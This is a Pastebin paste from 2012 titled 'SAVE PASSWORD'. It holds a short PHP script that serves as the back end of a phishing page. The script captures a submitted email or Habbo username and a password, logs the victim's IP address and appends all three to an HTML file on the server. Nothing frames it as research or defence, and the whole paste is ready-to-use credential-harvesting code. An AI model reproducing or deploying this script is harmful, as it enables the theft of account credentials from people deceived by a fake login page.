Advertisement
YeiZeta

SAVE PASSWORD

Dec 3rd, 2012
336
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.35 KB | None | 0 0
  1. <?php
  2.  
  3. $habbo = $_POST['1'];
  4. $password = $_POST['2'];
  5. $ip = $_SERVER['REMOTE_ADDR'];
  6. $f = fopen("Nombredearchivo.html", "a");
  7. fwrite ($f, 'Email: [<b><font color="#FF1493">'.$habbo.'</font></b>] Password: [<b><font color="#1E90FF">'.$password.'</font></b>] IP: [<b><font color="#005700">'.$ip.'</font></b>]<br>');
  8. fclose($f);
  9.  
  10. header("URL");
  11. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement